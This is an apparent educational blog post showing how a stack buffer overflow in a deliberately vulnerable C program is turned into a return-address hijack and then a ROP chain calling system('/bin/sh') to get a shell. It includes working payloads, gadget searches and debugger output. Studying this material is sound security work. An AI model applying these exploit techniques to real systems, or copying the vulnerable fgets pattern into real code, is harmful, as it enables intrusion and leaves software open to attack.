How bad are buffer overflows?

TLDR: Pretty bad.

Most programmers and software adjacent folks hear about how most security bugs are the product of a buffer overflow.

What is a buffer overflow?, I hear you ask?

This:

int main() {
    char buffer[16];
    fgets(buffer, 64, stdin);
    puts(buffer);
    return 0;
}

It's pretty small, seemingly harmless, and if you haven't seen one before, you might not even see that it's there.

So, how is this a buffer overflow? As the name indicates, it is possible to overflow the buffer, as in, fill the buffer with more data than the buffer can hold.

This is possible, in this sample, because the buffer can hold 16 characters, but we are able to write 64 characters into it, via fgets.

Let's take this code sample for a spin.

> ./buf_overflow
hello
hello

Alright, so I typed in hello, and I got hello, and it all terminated nicely. Ok, nothing wrong here.

Let's try a larger, more cordial greeting (politeness is key in when overflowing buffers).

> ./buf_overflow
Hello, there, exquisite gentleperson
Hello, there, exquisite gentleperson

Job 1, './buf_overflow' terminated by signal SIGSEGV (Address boundary error)

Aha! An error! Looks like we smashed the stack by writing a lot of characters. 36 characters in fact, ignoring the null terminator.

Let's be a little more conservative, and only send 17 characters.

> ./buf_overflow 
Hello, there, Jim
Hello, there, Jim

Uh, nothing bad happened. But we did overflow the buffer. We just didn't cause enough damage.

Ok, so what is enough damage?

After some search, we find that the first length that results in an error is 24.

> python -c "print('a' * 24)" | ./buf_overflow
aaaaaaaaaaaaaaaaaaaaaaaa

Process 57533, './buf_overflow' from job 1, '…' terminated by signal SIGSEGV (Address boundary error)

Now, after finding ourselves such a delighting fact, why 24?

Writing on the Stack

Recapping: our buffer can hold 16 bytes and we can write 64 bytes. After 24 bytes, we get an error.

First of all, where exactly are we overflowing out into? buffer is a local variable, so it lives on the stack¹.

A simple stack layout example

The stack is a handy region of memory that facilitates nested function calls and nested scoping in general. As I previously said, it also stores local variables, along with some other necessary information.

A very important piece of information that it stores is where a function should return to after finishing, which is stored in the return address.

In this scenario, we are overflowing in the main function, so our return address will point somewhere into the internals of libc, and we're not very interested in its particular value.

We are interested, however, in the fact that it is very important. If we happened to accidentally (or not so accidentally) overwrite the return address, the main function would finish and then jump to some corrupted memory address, which the operating system is very much against, and declares the process to be a big bully for not playing by the rules and aborts it.

Now, let's try and figure out why 24 is that magic sweet spot.

(pulls out a new sheet of internet paper)

A simple stack layout example with annotated addresses

Well, by fiddling around with gdb (or by using a suite of other amazing tools to inspect the stack), we can find out where in the stack buffer is, along with the return address.

In the diagram above, I've annotated some addresses that I extracted whilst debugging. As we can see, the buffer's address is at 0x7fffffffe050, and the return address is at 0x7fffffffe068. The frame base pointer essentially indicates where the main function's stack frame begins, and is not of much concern, right now, besides the fact that it is on the stack.

There are 16 bytes reserved for the buffer, then the frame base pointer and the return address are pointers, which take up a word of memory, which on my 64 bit system is, you guessed it, 64 bits, or 8 bytes. So, from the start of the buffer, to the start of the return address, there are $16 + 8 = 24$ bytes between them.

We could also just subtract both addresses, but I find this to be more pedagogical (and handier, when you don't know the addresses explicitly).

So, that is where our magical number 24 comes from. Hmmm, in fact, let me just have another quick look with gdb.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7da000a in ?? () from /usr/lib/libc.so.6

Ok, so by using python -c "print('a' * 24)" as an input, the corrupted return address is 0x00007ffff7da000a .

The correct address, when using just a as an input gives the address 0x7ffff7da5c88:

  0x55555555517b <main+50>    ret <0x7ffff7da5c88> 
    ↓
 ► 0x7ffff7da5c88             mov    edi, eax

We can see that the least significant four hexes from the correct address were overwritten, 0x5c88 to 0x000a.

The reason why is because our input, python -c "print('a' * 24)", is actually 24 a's, followed by a newline, followed by a null terminator, after fgets is done with it.

> python -c "print('a' * 24)" | hexdump
0000000 6161 6161 6161 6161 6161 6161 6161 6161
0000010 6161 6161 6161 6161 000a 
0000019

(Notice the 000a at the end of the hexdump!)

So we actually wrote a newline and a null terminator onto the return address and broke everything!

Alright, alright, we crashed a simple program with a buffer overflow, but how does this create a security vulnerability?

Why are buffer overflows so bad ?

Well, we only wrote a newline and a null byte. But we can do so, oh so much more. This right here, was the 'hammer it to break it' approach.

It's time to get surgical.

Jumping to other functions

Let's say, for demonstration's sake, that we had this function in our program:

void print_secret() { puts("My really secret value: \x34\x32"); }

Now, I really want to find what the secret value is.
But the function is not called anywhere in the source code. You might say "There is no way that we can find the secret!", but I beg to differ.

We just established that we can overwrite the return address of a function. We only overwrote it accidentally, but we can be a tad bit more precise.

If instead of the newline and null terminator we were able to place a valid address, we could jump execution to that address. In theory.

First of all, we need the address of the function that we want to jump to. With gdb, we can find that the address is 0x55555555516f:

pwndbg> p print_secret
$2 = {void ()} 0x55555555516f <print_secret>

Alright, now we need to overwrite the return address of main, to jump to print_secret. We can't just input aaaaaaaaaaaaaaaaaaaaaaaa0x55555555516f, since the address is being input as characters, with different values from the actual address bytes. Have a look:

> echo "aaaaaaaaaaaaaaaaaaaaaaaa0x55555555516f" > payload
> gdb buf_overflow 
pwndbg> r < payload
► 0x5555555551b7 <main+50>    ret    <0x3535353535357830>

So yeah, the return address is absolutely mangled and not what we wanted: 0x3535353535357830.

What we really need to do, is inputting the bytes in little endian byte order. Why little endian? Well... (flashbacks to the Great Endian war of Standardization) it just is.

So, 0x55555555516f in little endian would be 0x6f, 0x51, 0x55, 0x55, 0x55, 0x55.

The way we exploit this buffer overflow, then, is by injecting the function's address in little endian after the string of a's.

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\x6f\x51\x55\x55\x55\x55" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaaoQUUUU
My really secret value: 42
Job 1, './buf_overflow < payload' terminated by signal SIGSEGV (Address boundary error)

Haha! We leaked the secret!

If we inspect a little bit further with gdb, we can see that the address was correctly overwritten.

► 0x5555555551b7 <main+50>      ret  <0x55555555516f; print_secret>
   ↓
  0x55555555516f <print_secret> push   rbp

So, with a buffer overflow, and by knowing a functions address, we can call that function, if we so please!

I trust that you, dear reader, are starting to see just how dangerous a buffer overflow can get.

Running a Shell

Let's ramp this up a notch. If there are skeptical readers among you think that being able to call a function by knowing its address is interesting, but not very dangerous, then this section is for you.

We can have some fun of our own without strictly relying on the functions already present in the source code. In this section, I'm going to show you how you can start a shell with a buffer overflow.

Static Linking

For simplicities sake, I'm going to recompile the source code above as a statically linked binary. If you are unaware, static linking essentially means that the functions from the C Standard Library that the source code uses are also placed inside the binary.

If the binary isn't statically linked, then the following exploits are still possible, but with a bit more effort².

We can see that the binary is statically linked by using the file command:

> file buf_overflow
buf_overflow: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=791d87c05f1150e6e9df551870c5f25f2fb75284, for GNU/Linux 4.4.0, with debug_info, not stripped

The way that this helps us, is that besides jumping around functions in the source code, we can also jump into functions in libc, and by being statically linked, we can just as easily find their addresses.

For example, we can find the address of the exit function:

> gdb buf_overflow 
pwndbg> p exit 
$1 = {<text variable, no debug info>} 0x4047c0 <exit>

(You may notice that the address of exit is a bit shorter, than print_secret's. This is because I recompiled the binary statically, and the executable data region has changed. print_secret is, in fact, now at 0x40187b)

We can therefore call exit, which is provided by libc by placing its address on the payload:

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\xc0\x47\x40" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaaG@
> echo $status
160

We can check that exit was indeed called by noticing that there was no Segmentation Fault and a non-zero exit code was set.

We can try to call system, by finding its address:

> gdb buf_overflow 
pwndbg> p system
$1 = {<text variable, no debug info>} 0x404c70 <system>

But we would be calling system without providing an argument, besides the junk that resided in memory/registers that ends up getting passed to it. So how do we manipulate function call arguments?

Manipulating Arguments

The ways in which we can pass arguments to function calls are many, but in the end, they narrow down to the same principle: place the arguments you want in the place they are supposed to be (shocking, I known).

So, if the argument to a function has to be at a certain address in the stack, then you have to place your value at that address. More sneakily, if the argument needs to be at a certain offset from the base pointer of the function frame, then you can even manipulate the base pointer of the frame itself, and use values already in memory!

If the argument to the function needs to be in a certain register, then you need to overwrite that register. If overwriting isn't possible, you might call the function at a time that the value is inside that register.

There are many, many, many, ways of doing things, but I'm going to start off somewhat simple.

First of all, we need to figure out where the arguments are passed in.

32-bit vs 64-bit

In the olden days (and today), 32-bit binaries passed function call arguments on the stack. Before calling a function foo(int a, int b), what the function caller would do is push the values of b and a onto the stack (in reverse order of the arguments in the function signature), then push the return address and create the new function frame.

To my knowledge, this was done due to the limited number of registers on 32-bit architectures.

In 64-bit architectures, with all of the new registers we have, we now pass arguments in registers! Only up to 6 of them though, we still have limited registers and we have to be somewhat frugal. After the sixth argument, arguments are passed through the stack, as it was in 32-bit.

We have a 64-bit binary, so we will need to overwrite a certain register. Which one though?

Let's disassemble the system function and find out! (Everything is open source if you can reverse engineer it).

I'll be using radare2 to disassemble system, since radare gives us some parameter hints along with pretty disassembly.

> r2 -A buf_overflow
[...]
[0x00401740]> s sym.system 
[0x00404c70]> pdf
   ╎   ;-- __libc_system:
   ╎   ; CALL XREF from dbg.handy_backdoor @ 0x401873(x)
┌ 40: int sym.system (const char *string);
│  ╎   ; arg const char *string @ rdi
│  ╎   ; arg int64_t arg2 @ rsi
│  ╎   0x00404c70      f30f1efa       endbr64
│  ╎   0x00404c74      4885ff         test rdi, rdi         ; string
│ ┌──< 0x00404c77      7407           je 0x404c80
│ │└─< 0x00404c79      e962fbffff     jmp sym.do_system
..
│ │    ; CODE XREF from sym.system @ 0x404c77(x)
│ └──> 0x00404c80      55             push rbp
│      0x00404c81      488d3d7968..   lea rdi, str.exit_0   ; 0x47b501 ; "exit 0" ; int64_t arg1
│      0x00404c88      4889e5         mov rbp, rsp
│      0x00404c8b      e850fbffff     call sym.do_system
│      0x00404c90      5d             pop rbp
│      0x00404c91      85c0           test eax, eax
│      0x00404c93      0f94c0         sete al
│      0x00404c96      0fb6c0         movzx eax, al
└      0x00404c99      c3             ret
[0x00404c70]>

We can see that radare tells us that the first argument, which is a const char* called string is passed in the register rdi. Great! So we need to overwrite rdi and we can pass arguments to system!

But, uhm, how do we actually overwrite it? By jumping around, that's how.

ROP - Return Oriented Programming

We already saw how we can jump to an arbitrary memory address in the binary by overwriting a function's return address. Now it's time to punch this up to 11. We're going to be jumping several times around our binary.

How? By exploiting ret instructions in the binary. In particular, we'll be making use of sections of code that end in a ret instruction, normally called "gadgets".

The way that ret works is the following: Executing ret pops a value off of the stack and places it in the instruction pointer. That way, execution jumps to the address that was on the stack (or absolutely breaks down if the value wasn't a valid address).

So, the trick we're going to use is that we're going to be writing on the stack several addresses of these gadgets, and when we reach the end of a gadget, ret is called, and since the next value on the stack is the address of our gadget, the program executes our next gadget. The gadgets chain each other on.

This is the key idea behind Return Oriented Programming, or ROP, for short.

Now, let's get down to details. What do we have to do, and where do we have to jump to? Well, we have to overwrite rdi somehow, so we'll need a gadget that can write into rdi any value that we want.

Let's look for one. To do that I'll be using a nifty tool called ROPgadget that can list out all the gadgets in a binary, filter them, generate a complete chain of gadgets that will give you a complete shell automatically (this is pretty busted, ngl), etc.

> ROPgadget --binary buf_overflow 
Gadgets information
============================================================
0x0000000000453275 : adc ah, bh ; jmp 0x453173
0x000000000041765d : adc ah, bh ; ret
0x0000000000447d82 : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0x4910
0x0000000000447dd7 : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0xe910
0x0000000000466507 : adc al, 0 ; add byte ptr [rax], al ; jmp 0x4660e0
0x0000000000471748 : adc al, 0 ; add byte ptr [rax], al ; leave ; ret
0x0000000000420835 : adc al, 0 ; add byte ptr [rax], al ; syscall
0x0000000000465ed2 : adc al, 0 ; add byte ptr [rax], al ; xor eax, eax ; jmp 0x465ea6
0x000000000044ea48 : adc al, 0 ; add byte ptr [rbp - 0x77], cl ; retf
0x000000000044eabf : adc al, 0 ; add byte ptr [rcx - 0x7d], cl ; jmp 0x44ead6
0x0000000000457707 : adc al, 0x11 ; mov byte ptr [rax - 1], dl ; jmp 0x457678
0x000000000041bd81 : adc al, 0x11 ; mov qword ptr [rax + 8], rdx ; ret
0x0000000000433476 : adc al, 0x16 ; jmp 0x432ab4
0x00000000004374dc : adc al, 0x16 ; jmp 0x437177
0x000000000044c399 : adc al, 0x16 ; sub eax, edx ; ret
0x00000000004591a9 : adc al, 0x24 ; jmp 0x458d29
0x000000000041a6c1 : adc al, 0x25 ; sub byte ptr [rax], al ; add byte ptr [rax], al ; jne 0x41a70b ; leave ; ret
0x000000000041a756 : adc al, 0x25 ; sub byte ptr [rax], al ; add byte ptr [rax], al ; jne 0x41a79b ; leave ; ret
[ ... Several hundereds of lines follow ... ]

Since the binary is statically linked, the list is massive, so I'll try and narrow it down. I have an idea of what I'm looking for, so I'm going to go and filter this list.

> ROPgadget --binary buf_overflow --re "pop rdi"
0x000000000046322e : pop rdi ; pop rbp ; jmp 0x462bf0
0x0000000000475ac5 : pop rdi ; pop rbp ; jmp 0x475700
0x00000000004280e7 : pop rdi ; pop rbp ; jmp r10
0x000000000042752a : pop rdi ; pop rbp ; jmp rax
0x000000000040216d : pop rdi ; pop rbp ; ret
0x00000000004402cd : pop rdi ; stosd dword ptr [rdi], eax ; cld ; dec dword ptr [rax - 0x75] ; jge 0x4402bd ; jmp 0x44026f
0x0000000000470ade : pop rsi ; pop rdi ; mov rcx, rax ; jmp 0x470a2e
0x0000000000417de3 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x417c82
0x00000000004184f3 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x41851e
0x0000000000451413 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x4514f9
0x0000000000411a91 : stosd dword ptr [rdi], eax ; pop rdi ; add byte ptr [rax], al ; cmovne rax, rdx ; ret
0x0000000000454dce : xor ebp, ebp ; pop rax ; pop rdi ; call rax
[...]

Alright, we've got a pretty good gadget at address 0x000000000040216d with gadget pop rdi ; pop rbp ; ret.

An ideal gadget would have been pop rdi; ret, since we could just pop a value off the stack into rdi, and that'd be it, but alas, we have no such gadget in our binary. That would be too easy. So, we have a pop rbp tagging along. But this is manageable.

What we need to do now, is overwrite the return address of main with our gadget's address, and place on the stack, after the return address, the value we want to overwrite rdi with, some dummy value for rbp and then the address of system.

This way, we ret into system with the value that we want in rdi

Let's give it a try!

Executing the ROP Chain

So our input has to start with the chain of 'a's that pad to the return address, which were 24 'a's. Then it needs the address of the gadget, in little endian, which is x6d\x21\x40\x00\x00\x00\x00\x00. After that, we place the value that we want rdi to have, for now I'll just place a 1 (\x01\x00\x00\x00\x00\x00\x00\x00). Then we add some dummy bytes because of pop rbp (aaabaaac). Then we place the address of system, in little endian, which is \x70\x4c\x40\x00\x00\x00\x00\x00.

Got it? I can't know your answer, so, if you did, great job! If not re-read it a couple of times, or skip ahead if you wish. I don't mind (I too do this).

The full chain is the following:

aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00

Let's try it out!

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00" > payload 
> gdb buf_overflow
pwndbg> b system
pwndbg> r < payload
[...]
Breakpoint 1, 0x0000000000404c70 in system ()
 ► 0x404c70 <system>          endbr64 
   0x404c74 <system+4>        test   rdi, rdi
   0x404c77 <system+7>        je     404c80h      <system+16>
pwndbg> p $rdi
$1 = 1

Success! We jumped to system with rdi having value 1!

Alright, we are only one step away from completing our shell takeover. We can't stop now! Time to crack this open!

Finding /bin/sh

To crack open a shell, we need to pass the string "/bin/sh" as the argument to system. There are, as always, many ways to do this: - You could inject the string into the buffer you overflowed and then pass the buffer's address as the argument - Or, if the string is already present in the binary, just pass its address.

Since our binary is statically compiled, we can just find the string in our binary.

I'll be using radare, once again, to do this:

> r2 -A buf_overflow
[...]
[0x00401740]> / /bin/sh
0x0047b4f9 hit0_0 .c != NULL-c--/bin/shexit 0 glibc: .

So, we have the string "/bin/sh" at address 0x0047b4f9. All we need to do now is instead of passing 1 as the argument to pass 0x0047b4f9.

Putting it all together

By writing the address of "/bin/sh" in little endian on the chain, the final ROP chain ends up being:

aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\xf9\xb4\x47\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00

Which is pretty incomprehensible, but it should get the job done.

Here's what happens when we try to run it:³

> echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\xf9\xb4\x47\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaam!@
ls
buf_overflow  buf_overflow.c  Makefile  payload 
whoami
jpl

SUCCESS!!

We have ourselves a shell! From here, we can fiddle around with the system, create files, read files, open network connections, all the fun, dangerous, extremely scary things remote shells can do.

Wrapping Up

So, to answer the main question of this post: How bad are buffer overflows?

Very bad.

Not because buffer overflows are dangerous by themselves, but because they open up an extremely wide range of possible exploits.

Once you open up the floodgates of being able to overwrite some piece of data on the stack, especially return addresses, you can start composing exploits together into something that could end up being a very nasty exploit. You could start ROP'ing around and try to system into a shell. If that isn't possible, you can try to ROP through an execve into a shell. If that isn't possible, you can try to ROP into syscalls to try and read/write from/to files. You can skip ROP to a one_gadget into a shell, etc.

And even though I haven't covered them here, some defenses such as ASLR and PIE can be sidestepped via leaking addresses, which is also possible via buffer overflows.

Buffer overflows are a pristine red carpet into exploiting a binary, and there are a lot of buffer overflows out in the wild.

Repeat after me, buffer overflows, very, very, bad.

It is not actually guaranteed that local variables live on the stack. It is up to the compiler where local variables are stored, but most compilers place them on the stack, so I'm going to keep referring to them as living on the stack.

If the binary isn't statically linked, if you know the libc being used, you can still find the addresses of functions in libc by knowing the libc's base address after linking, which you can find via address leaks.

Weirdly enough, running it directly on the shell wasn't working for me, but running it through pwntools or gdb with the exact payload works. ¯\_(ツ)_/¯. The output you see was run through gdb.